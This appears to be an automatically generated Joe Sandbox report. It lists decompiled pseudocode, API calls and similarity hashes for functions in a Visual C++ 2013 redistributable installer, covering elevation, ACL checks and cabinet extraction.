Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime_memset
String ID: logutil.cpp
API String ID: 654766419-3545173039
Opcode ID: 281bc3c07f8d352df2446fbca798d8291797a0ab1d8a066ece3232ca225d1745
Instruction ID: fc02162342d611ba482708e55eb5f1fb47ceb14c562cb2ddbf2025edcbb41a80
Opcode Fuzzy Hash: 281bc3c07f8d352df2446fbca798d8291797a0ab1d8a066ece3232ca225d1745
Instruction Fuzzy Hash: ED31D331521227FFCB216F24EE8DDAE7E76EB44B90F610512F20997058CB798D51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01296DF1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E01296DF1(void* __ecx, void* __edx, unsigned int _a4, short* _a8, short* _a12, signed int* _a16) {
				signed int _v8;
				void* __esi;
				unsigned int _t35;
				void* _t36;
				signed int _t43;
				int _t49;
				int _t52;
				void* _t57;
				int _t61;
				int _t66;
				void* _t75;

				_t57 = __edx;
				_v8 = _v8 & 0x00000000;
				_t66 = _a4 >> 0x00000011 & 0x00000001;
				_t52 = lstrlenW(_a8);
				_t61 = lstrlenW(_a12);
				_t35 = _a4;
				if(_t35 > 0x3000a) {
					_t36 = _t35 - 0x3000b;
					if(_t36 == 0) {
						goto L21;
					} else {
						if(_t36 == 1) {
							goto L15;
						} else {
							goto L11;
						}
					}
				} else {
					if(_t35 >= 0x30005) {
						L7:
						_t49 = CompareStringW(0x7f, _t66, _a8, _t52, _a12, _t61);
						asm("cdq");
						_v8 = E01296A6F(_a4, _a16, _t49, _t57, 2, 0);
					} else {
						if(_t35 < 0x10005) {
							L12:
							_v8 = 0x80070057;
						} else {
							if(_t35 <= 0x1000a) {
								goto L7;
							} else {
								if(_t35 == 0x1000b) {
									L21:
									if(_t61 > _t52) {
										L25:
										 *_a16 =  *_a16 & 0x00000000;
									} else {
										_a4 = _t61;
										while(CompareStringW(0x7f, _t66, _a8, _t61, _a12, _t61) != 2) {
											_a8 =  &(_a8[1]);
											_a4 = _a4 + 1;
											if(_a4 <= _t52) {
												continue;
											} else {
												goto L25;
											}
											goto L26;
										}
										 *_a16 = 1;
									}
								} else {
									if(_t35 == 0x1000c) {
										L15:
										if(_t52 < _t61) {
											goto L19;
										} else {
											_push(_t61);
											_push(_a12);
											_push(_t61);
											_push(_a8);
											goto L17;
										}
										goto L20;
									} else {
										_t75 = _t35 - 0x1000d;
										L11:
										if(_t75 == 0) {
											if(_t52 < _t61) {
												L19:
												_t43 = 0;
											} else {
												_push(_t61);
												_push(_a12);
												_push(_t61);
												_push( &(_a8[_t52 - _t61]));
												L17:
												if(CompareStringW(0x7f, _t66, ??, ??, ??, ??) != 2) {
													goto L19;
												} else {
													_t43 = 1;
												}
											}
											L20:
											 *_a16 = _t43;
										} else {
											goto L12;
										}
									}
								}
							}
						}
					}
				}
				L26:
				return _v8;
			}

0x01296df1
0x01296df5
0x01296e0b
0x01296e13
0x01296e17
0x01296e19
0x01296e21
0x01296e7c
0x01296e81
0x00000000
0x01296e83
0x01296e84
0x00000000
0x01296e86
0x00000000
0x01296e86
0x01296e84
0x01296e23
0x01296e28
0x01296e51
0x01296e5c
0x01296e67
0x01296e74
0x01296e2a
0x01296e2f
0x01296e89
0x01296e89
0x01296e31
0x01296e36
0x00000000
0x01296e38
0x01296e3d
0x01296ece
0x01296ed0
0x01296efd
0x01296f00
0x01296ed2
0x01296ed5
0x01296edb
0x01296ef1
0x01296ef5
0x01296efb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01296efb
0x01296f10
0x01296f10
0x01296e43
0x01296e48
0x01296ea6
0x01296ea8
0x00000000
0x01296eaa
0x01296eaa
0x01296eab
0x01296eae
0x01296eaf
0x00000000
0x01296eaf
0x00000000
0x01296e4a
0x01296e4a
0x01296e87
0x01296e87
0x01296e94
0x01296ec5
0x01296ec5
0x01296e96
0x01296e99
0x01296e9a
0x01296e9f
0x01296ea3
0x01296eb2
0x01296ebe
0x00000000
0x01296ec0
0x01296ec2
0x01296ec2
0x01296ebe
0x01296ec7
0x01296eca
0x00000000
0x00000000
0x00000000
0x01296e87
0x01296e48
0x01296e3d
0x01296e36
0x01296e2f
0x01296e28
0x01296f03
0x01296f0a

APIs

lstrlenW.KERNEL32(?,0000000E,?,00000000,00000002,?,01297024,0000000E,?,?,?,?), ref: 01296E0E
lstrlenW.KERNEL32(?,?,01297024,0000000E,?,?,?,?), ref: 01296E15
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,01297024,0000000E,?,?,?,?), ref: 01296E5C
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,01297024,0000000E,?,?,?,?), ref: 01296EB5
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,01297024,0000000E,?,?,?,?), ref: 01296EE6

Strings

W, xrefs: 01296E89

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: W
API String ID: 1657112622-655174618
Opcode ID: 7b1f431c80ae7338f07b789ed033b2fd279c61dd24bce6888d8061b8e005de28
Instruction ID: ffc316166a315390ffe726379fe3dee8a2b8503d35737ce0bd0f6d42c709f087
Opcode Fuzzy Hash: 7b1f431c80ae7338f07b789ed033b2fd279c61dd24bce6888d8061b8e005de28
Instruction Fuzzy Hash: D731707252024ABBCF228F5DC889EAF3BE9EB85350F108815FA55DB150C375D990CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0128F9CA Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0128F9CA(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* __esi;
				intOrPtr* _t19;
				void* _t20;
				void* _t50;
				void* _t51;
				void* _t54;
				void* _t56;
				intOrPtr _t57;

				_t49 = __edx;
				_v8 = _v8 | 0xffffffff;
				_t57 = _a4;
				_t4 = _t57 + 0xc8; // 0xe8458dab
				_t19 =  *_t4;
				_t44 =  *_t19;
				_t20 =  *((intOrPtr*)( *_t19 + 0x6c))(_t19, _t50, _t56, __ecx);
				_t6 = _t57 + 0xb8; // 0x12813c5
				_t51 = E0128BC36(_t6, 1, _t20);
				if(_t51 >= 0) {
					_t7 = _t57 + 0x498; // 0x12817a5
					_t8 = _t57 + 0x494; // 0x12817a1
					_t40 = _t8;
					if(E012828DB(__edx, _t8, _t7) >= 0) {
						if(E012835A5(_t57, _t40, 1,  &_v8) >= 0) {
							while(1) {
								_t11 = _t57 + 0x494; // 0x12817a1
								_t12 = _t57 + 0x490; // 0x8900011a
								_t54 = E01282ADE( *_t12, _t11, 1, _a8);
								if(_t54 >= 0) {
									break;
								}
								if(_t54 == 0x800704c7 || _t54 == 0x80070005) {
									_t13 = _t57 + 0xc8; // 0xe8458dab
									_t54 = 0x80070642;
									if(E0128B7CD(_t44, _t49,  *_t13, 0, 0, 0x80070642, 0, 0x15, 0) == 4) {
										continue;
									} else {
										goto L15;
									}
								} else {
									if(_t54 < 0) {
										L15:
										_push("Failed to elevate.");
										goto L16;
									}
								}
								goto L17;
							}
							_t14 = _t57 + 0x494; // 0x12817a1
							_t54 = E01282BBB(_t14);
							if(_t54 < 0) {
								_push("Failed to connect to elevated child process.");
								goto L16;
							}
						} else {
							_push("Failed to create pipe and cache pipe.");
							goto L16;
						}
					} else {
						_push("Failed to create pipe name and client token.");
						L16:
						_push(_t54);
						E012AFA86();
					}
					L17:
				} else {
					E012B294E(_t22, "elevation.cpp", 0xf4, _t51);
					_push("UX aborted elevation requirement.");
					_push(_t51);
					E012AFA86();
				}
				if(_v8 != 0) {
					CloseHandle(_v8);
					_v8 = _v8 & 0x00000000;
				}
				if(_t54 < 0) {
					E01282872(_t57 + 0x494);
				}
				return _t54;
			}

0x0128f9ca
0x0128f9ce
0x0128f9d3
0x0128f9d6
0x0128f9d6
0x0128f9dc
0x0128f9e0
0x0128f9e6
0x0128f9f2
0x0128f9f6
0x0128fa1b
0x0128fa22
0x0128fa22
0x0128fa32
0x0128fa4e
0x0128fa5c
0x0128fa5f
0x0128fa68
0x0128fa73
0x0128fa79
0x00000000
0x00000000
0x0128fa81
0x0128fa92
0x0128fa98
0x0128faa2
0x00000000
0x0128faa4
0x00000000
0x0128faa4
0x0128fabf
0x0128fac1
0x0128fac3
0x0128fac3
0x00000000
0x0128fac3
0x0128fac1
0x00000000
0x0128fa81
0x0128faa6
0x0128fab2
0x0128fab6
0x0128fab8
0x00000000
0x0128fab8
0x0128fa50
0x0128fa50
0x00000000
0x0128fa50
0x0128fa34
0x0128fa34
0x0128fac8
0x0128fac8
0x0128fac9
0x0128facf
0x0128fad0
0x0128f9f8
0x0128fa03
0x0128fa08
0x0128fa0d
0x0128fa0e
0x0128fa14
0x0128fad5
0x0128fada
0x0128fae0
0x0128fae0
0x0128fae6
0x0128faef
0x0128faef
0x0128faf9

APIs

CloseHandle.KERNEL32(00000000,8900011A,012817A1,00000001,?,012817A1,00000001,000000FF,012817A1,012817A5,00000000,012813C5,00000001,00000000,?,0128BD3C), ref: 0128FADA

Strings

Failed to elevate., xrefs: 0128FAC3
Failed to connect to elevated child process., xrefs: 0128FAB8
UX aborted elevation requirement., xrefs: 0128FA08
elevation.cpp, xrefs: 0128F9FE
Failed to create pipe and cache pipe., xrefs: 0128FA50
Failed to create pipe name and client token., xrefs: 0128FA34

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: 637c4326f3d1c51fa81ed50f46dcfa60f14296f6cdd14535ac636cbd111e9c8f
Instruction ID: 3e83b9eb461caf2f3a70001f24ba950d0b47003365094e50ec40beaa74e43a13
Opcode Fuzzy Hash: 637c4326f3d1c51fa81ed50f46dcfa60f14296f6cdd14535ac636cbd111e9c8f
Instruction Fuzzy Hash: AF312973172706BAEB12F664CD81FBBB3AD9B80630F10442DF60AA71C1EE74A9058324

Uniqueness

Uniqueness Score: -1.00%

Function 0129C569 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0129C569(void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t35;
				intOrPtr* _t54;
				char _t56;
				void* _t57;

				_t56 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				if(_a8 <= 0) {
					L28:
					return _t56;
				}
				_t54 = _a4 + 8;
				do {
					if(_a24 == 0) {
						if(_a16 == 0) {
							L9:
							_t34 =  *((intOrPtr*)(_t54 - 4));
							L10:
							_t49 =  &_v8;
							_t35 = E01288C14(_a12, _t34,  &_v8, 0);
							L11:
							_t56 = _t35;
							if(_t56 < 0) {
								_push("Failed to format property value.");
								L21:
								_push(_t56);
								E012AFA86();
								L22:
								if(_v8 != 0) {
									E012B01E8(_v8);
								}
								if(_v12 != 0) {
									E012B01E8(_v12);
								}
								if(_v16 != 0) {
									E012B01E8(_v16);
								}
								goto L28;
							}
							_t56 = E0129B1F3(_v8,  &_v12);
							if(_t56 < 0) {
								_push("Failed to escape string.");
								goto L21;
							}
							_push(_v12);
							_t56 = E012B177A( &_v16, L" %s%=\"%s\"",  *((intOrPtr*)(_t54 - 8)));
							_t57 = _t57 + 0x10;
							if(_t56 < 0) {
								_push("Failed to format property string part.");
								goto L21;
							}
							_t56 = E012B1325(_t49, _a20, _v16, 0);
							if(_t56 < 0) {
								_push("Failed to append property string part.");
								goto L21;
							}
							goto L15;
						}
						_t34 =  *_t54;
						if( *_t54 != 0) {
							goto L10;
						}
						goto L9;
					}
					if(_a16 == 0) {
						L5:
						_t47 =  *((intOrPtr*)(_t54 - 4));
						L6:
						_t49 =  &_v8;
						_t35 = E0128B5C7(_a12, _t47,  &_v8, 0);
						goto L11;
					}
					_t47 =  *_t54;
					if( *_t54 != 0) {
						goto L6;
					}
					goto L5;
					L15:
					_v20 = _v20 + 1;
					_t54 = _t54 + 0xc;
				} while (_v20 < _a8);
				goto L22;
			}

0x0129c573
0x0129c575
0x0129c578
0x0129c57b
0x0129c57e
0x0129c584
0x0129c675
0x0129c67a
0x0129c67a
0x0129c58e
0x0129c591
0x0129c594
0x0129c5b7
0x0129c5bf
0x0129c5bf
0x0129c5c2
0x0129c5c3
0x0129c5cb
0x0129c5d0
0x0129c5d0
0x0129c5d4
0x0129c62b
0x0129c645
0x0129c645
0x0129c646
0x0129c64d
0x0129c651
0x0129c656
0x0129c656
0x0129c65e
0x0129c663
0x0129c663
0x0129c66b
0x0129c670
0x0129c670
0x00000000
0x0129c66b
0x0129c5e2
0x0129c5e6
0x0129c632
0x00000000
0x0129c632
0x0129c5e8
0x0129c5fc
0x0129c5fe
0x0129c603
0x0129c639
0x00000000
0x0129c639
0x0129c611
0x0129c615
0x0129c640
0x00000000
0x0129c640
0x00000000
0x0129c615
0x0129c5b9
0x0129c5bd
0x00000000
0x00000000
0x00000000
0x0129c5bd
0x0129c599
0x0129c5a1
0x0129c5a1
0x0129c5a4
0x0129c5a5
0x0129c5ad
0x00000000
0x0129c5ad
0x0129c59b
0x0129c59f
0x00000000
0x00000000
0x00000000
0x0129c617
0x0129c617
0x0129c61d
0x0129c620
0x00000000

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0129C5CB

Strings

Failed to escape string., xrefs: 0129C632
%s%="%s", xrefs: 0129C5F1
Failed to append property string part., xrefs: 0129C640
Failed to format property string part., xrefs: 0129C639
Failed to format property value., xrefs: 0129C62B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: a41d8f54a8e7f95fd061b9ebde61ba2a7a4318ad1df3125fd0d1d3ef87e08a68
Instruction ID: c1b018f634ee82ffce71fc20dcb115cbc2d16067a0820c6d5e5f7d041826d2a8
Opcode Fuzzy Hash: a41d8f54a8e7f95fd061b9ebde61ba2a7a4318ad1df3125fd0d1d3ef87e08a68
Instruction Fuzzy Hash: 10315A72D2021BEF9F21AF9CD8818EEBBB5EF54344B14456AE715B2100D370AEA0CB95

Uniqueness

Uniqueness Score: -1.00%

Function 012AFCB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E012AFCB8(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8) {
				void* _v8;
				void* _v12;
				void* __edi;
				signed int _t24;
				signed int _t26;
				signed int _t27;
				signed int _t46;

				_t24 = _a8;
				_v8 = 0;
				_v12 = 0;
				if(_t24 != 0) {
					_t4 = _t24 + 8; // 0xff809be8
					_t39 =  *_t4;
					__eflags =  *_t4;
					if(__eflags == 0) {
						_t10 = _t24 + 0x30; // 0xfff45d89
						_t11 = _t24 + 0x12; // 0xec83ec8b
						_t12 = _t24 + 0x2c; // 0xfc5d89f6
						_t25 = _t24 + 0xc;
						_t13 = _t25 + 0x1c; // 0xec8b5500
						_t14 = _t25 + 0x18; // 0x4c2c9ff
						_t15 = _t25 + 0x14; // 0xff809be8
						_t16 = _t25 + 0x10; // 0x5bcd335e
						_t17 = _t25 + 0xc; // 0x5ffc4d8b
						_t18 = _t25 + 8; // 0xfffffeb6
						_t26 = AllocateAndInitializeSid(_t24 + 0xc,  *_t11 & 0x000000ff,  *_t18,  *_t17,  *_t16,  *_t15,  *_t14,  *_t13,  *_t12,  *_t10,  &_v8);
						__eflags = _t26;
						if(_t26 != 0) {
							goto L4;
						} else {
							_t24 = GetLastError();
							__eflags = _t24;
							if(_t24 > 0) {
								_t24 = _t24 & 0x0000ffff | 0x80070000;
								__eflags = _t24;
							}
							_t46 = _t24;
							__eflags = _t46;
							if(_t46 >= 0) {
								_t46 = 0x80004005;
							}
							_push(_t46);
							_push(0x29);
							goto L10;
						}
					} else {
						_t46 = E012AFB2B(__ebx, 0, __eflags, 0, _t39,  &_v8);
						__eflags = _t46;
						if(_t46 >= 0) {
							L4:
							_t27 =  &_v12;
							__imp__CheckTokenMembership(_a4, _v8, _t27);
							__eflags = _t27;
							if(_t27 != 0) {
								__eflags = _v12;
								_t21 = _v12 == 0;
								__eflags = _t21;
								_t46 = 0 | _t21;
							} else {
								_t24 = GetLastError();
								__eflags = _t24;
								if(_t24 > 0) {
									_t24 = _t24 & 0x0000ffff | 0x80070000;
									__eflags = _t24;
								}
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 >= 0) {
									_t46 = 0x80004005;
								}
								_push(_t46);
								_push(0x2f);
								goto L10;
							}
						}
					}
				} else {
					_t46 = 0x80070057;
					_push(0x80070057);
					_push(0x1d);
					L10:
					_push("aclutil.cpp");
					E012B294E(_t24);
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				return _t46;
			}

0x012afcbd
0x012afcc4
0x012afcc7
0x012afccc
0x012afcd8
0x012afcd8
0x012afcdb
0x012afcdd
0x012afd3e
0x012afd41
0x012afd45
0x012afd48
0x012afd4b
0x012afd4e
0x012afd51
0x012afd54
0x012afd57
0x012afd5a
0x012afd5f
0x012afd65
0x012afd67
0x00000000
0x012afd69
0x012afd69
0x012afd6f
0x012afd71
0x012afd78
0x012afd78
0x012afd78
0x012afd7d
0x012afd7f
0x012afd81
0x012afd83
0x012afd83
0x012afd88
0x012afd89
0x00000000
0x012afd89
0x012afcdf
0x012afcea
0x012afcec
0x012afcee
0x012afcf4
0x012afcf4
0x012afcfe
0x012afd04
0x012afd06
0x012afd8f
0x012afd92
0x012afd92
0x012afd95
0x012afd0c
0x012afd0c
0x012afd12
0x012afd14
0x012afd1b
0x012afd1b
0x012afd1b
0x012afd20
0x012afd22
0x012afd24
0x012afd26
0x012afd26
0x012afd2b
0x012afd2c
0x00000000
0x012afd2c
0x012afd06
0x012afcee
0x012afcce
0x012afcce
0x012afcd3
0x012afcd4
0x012afd2e
0x012afd2e
0x012afd33
0x012afd33
0x012afd9a
0x012afd9f
0x012afd9f
0x012afdaa

APIs

CheckTokenMembership.ADVAPI32(?,?,?,?,?,?,012AFE02,?,?,773D9EB0,?,00000000), ref: 012AFCFE
GetLastError.KERNEL32(?,?,?,012AFE02,?,?,773D9EB0,?,00000000), ref: 012AFD0C
AllocateAndInitializeSid.ADVAPI32(012AFDF6,EC83EC8B,FFFFFEB6,5FFC4D8B,5BCD335E,FF809BE8,04C2C9FF,EC8B5500,FC5D89F6,FFF45D89,?,?,?), ref: 012AFD5F
GetLastError.KERNEL32(?,?,?,012AFE02,?,?,773D9EB0,?,00000000), ref: 012AFD69
FreeSid.ADVAPI32(?,?,?,?,012AFE02,?,?,773D9EB0,?,00000000), ref: 012AFD9F

Strings

aclutil.cpp, xrefs: 012AFD2E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$AllocateCheckFreeInitializeMembershipToken
String ID: aclutil.cpp
API String ID: 1125035699-2159165307
Opcode ID: 7aa334789b305c4755c9ee62a5c34ce07f80af931101a2b80ba0d4f06f09f28b
Instruction ID: 1a7a6f0d003afaf154b4ec1bbb7141c3f2b0959646187064e4e9ae8caa50a5b7
Opcode Fuzzy Hash: 7aa334789b305c4755c9ee62a5c34ce07f80af931101a2b80ba0d4f06f09f28b
Instruction Fuzzy Hash: DC21F232520515FFDB229B98DD4CEAEBEB9EF04350F6545A4E615EB060E2398E00DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 012A5966 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E012A5966(void* __ecx, void* _a8, long _a12) {
				long _v8;
				signed int _t21;
				intOrPtr _t25;
				signed int _t27;
				signed int _t30;
				long _t36;
				signed int _t47;
				intOrPtr _t50;

				_t21 =  *0x12d4fd4; // 0x0
				_t50 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t21 * 4)) + 4));
				_t47 = 0;
				_v8 = _v8 & 0;
				_t25 =  *((intOrPtr*)(_t50 + 0x2c));
				if(_t25 == 0) {
					_t27 = WriteFile( *(_t50 + 0x3c), _a8, _a12,  &_v8, 0);
					if(_t27 != 0) {
						L11:
						 *(_t50 + 0x30) = _t47;
						if(_t47 >= 0) {
							return _v8;
						} else {
							return _t27 | 0xffffffff;
						}
					}
					_t30 = GetLastError();
					if(_t30 > 0) {
						_t30 = _t30 & 0x0000ffff | 0x80070000;
					}
					_t47 = _t30;
					if(_t47 >= 0) {
						_t47 = 0x80004005;
					}
					E012B294E(_t30, "cabextract.cpp", 0x2e3, _t47);
					_push("Failed to write during cabinet extraction.");
					L10:
					_push(_t47);
					_t27 = E012AFA86();
					goto L11;
				}
				if(_t25 == 1) {
					_t36 = _a12;
					_t27 = E012A8221( *((intOrPtr*)(_t50 + 0x40)) +  *((intOrPtr*)(_t50 + 0x48)),  *((intOrPtr*)(_t50 + 0x44)) -  *((intOrPtr*)(_t50 + 0x48)), _a8, _t36);
					 *((intOrPtr*)(_t50 + 0x48)) =  *((intOrPtr*)(_t50 + 0x48)) + _t36;
					_v8 = _t36;
					goto L11;
				}
				_t47 = 0x8007139f;
				_push("Unexpected call to CabWrite().");
				goto L10;
			}

0x012a596a
0x012a597a
0x012a5981
0x012a5983
0x012a598a
0x012a598b
0x012a59d3
0x012a59db
0x012a5a19
0x012a5a19
0x012a5a20
0x012a5a2b
0x012a5a22
0x012a5a26
0x012a5a26
0x012a5a20
0x012a59dd
0x012a59e5
0x012a59ec
0x012a59ec
0x012a59f1
0x012a59f5
0x012a59f7
0x012a59f7
0x012a5a07
0x012a5a0c
0x012a5a11
0x012a5a11
0x012a5a12
0x00000000
0x012a5a18
0x012a598e
0x012a59a3
0x012a59b3
0x012a59bb
0x012a59be
0x00000000
0x012a59c1
0x012a5990
0x012a5995
0x00000000

APIs

_memcpy_s.LIBCMT ref: 012A59B3
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 012A59D3
GetLastError.KERNEL32 ref: 012A59DD

Strings

Unexpected call to CabWrite()., xrefs: 012A5995
cabextract.cpp, xrefs: 012A5A02
Failed to write during cabinet extraction., xrefs: 012A5A0C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: 61a3053503990b25de4169fe04f20cbaf2f237037b1c0761f8176609b32af0c6
Instruction ID: e3683d7f49448e65ebcdbcfa373fcedeb20a547e773164a497b252f4c1f8058c
Opcode Fuzzy Hash: 61a3053503990b25de4169fe04f20cbaf2f237037b1c0761f8176609b32af0c6
Instruction Fuzzy Hash: 5A21DE72620706AFDB20CF69DD84E7BB7F8FB88724B50052DFA09D7251D671EA008B64

Uniqueness

Uniqueness Score: -1.00%

Function 012A5899 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E012A5899(void* __esi) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				intOrPtr _t23;
				void* _t28;
				void* _t38;
				intOrPtr _t43;
				void* _t44;
				void* _t50;

				_t50 = __esi;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t43 = 0;
				_t23 =  *((intOrPtr*)(__esi + 0x2c));
				if(_t23 == 0) {
					if(DosDateTimeToFileTime( *(_t44 + 0x18) & 0x0000ffff,  *(_t44 + 0x1a) & 0x0000ffff,  &_v20) != 0 && LocalFileTimeToFileTime( &_v20,  &_v12) != 0) {
						SetFileTime( *(__esi + 0x3c),  &_v12,  &_v12,  &_v12);
					}
					_t28 =  *(_t50 + 0x3c);
					if(_t28 != 0xffffffff) {
						CloseHandle(_t28);
						 *(_t50 + 0x3c) =  *(_t50 + 0x3c) | 0xffffffff;
					}
				} else {
					_t38 = _t23 - 1;
					if(_t38 != 0) {
						_t40 = _t38 == 0;
						if(_t38 == 0) {
							_t43 = 0x80004004;
						} else {
							_t43 = 0x8007139f;
							E012B294E(_t40, "cabextract.cpp", 0x275, 0x8007139f);
							_push("Invalid operation for this state.");
							_push(0x8007139f);
							E012AFA86();
						}
					}
				}
				 *((intOrPtr*)(_t50 + 0x30)) = _t43;
				return (0 | _t43 > 0x00000000) + (0 | _t43 > 0x00000000) - 1;
			}

0x012a5899
0x012a58a6
0x012a58a7
0x012a58ad
0x012a58ae
0x012a58b2
0x012a58b5
0x012a58b6
0x012a5902
0x012a591f
0x012a591f
0x012a5925
0x012a592b
0x012a592e
0x012a5934
0x012a5934
0x012a58b8
0x012a58b8
0x012a58b9
0x012a58bc
0x012a58bd
0x012a58e5
0x012a58bf
0x012a58cf
0x012a58d1
0x012a58d6
0x012a58db
0x012a58dc
0x012a58e2
0x012a58bd
0x012a58b9
0x012a5940
0x012a5949

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 012A58FA
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 012A590C
SetFileTime.KERNEL32(?,?,?,?), ref: 012A591F
CloseHandle.KERNEL32(?), ref: 012A592E

Strings

Invalid operation for this state., xrefs: 012A58D6
cabextract.cpp, xrefs: 012A58CA

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

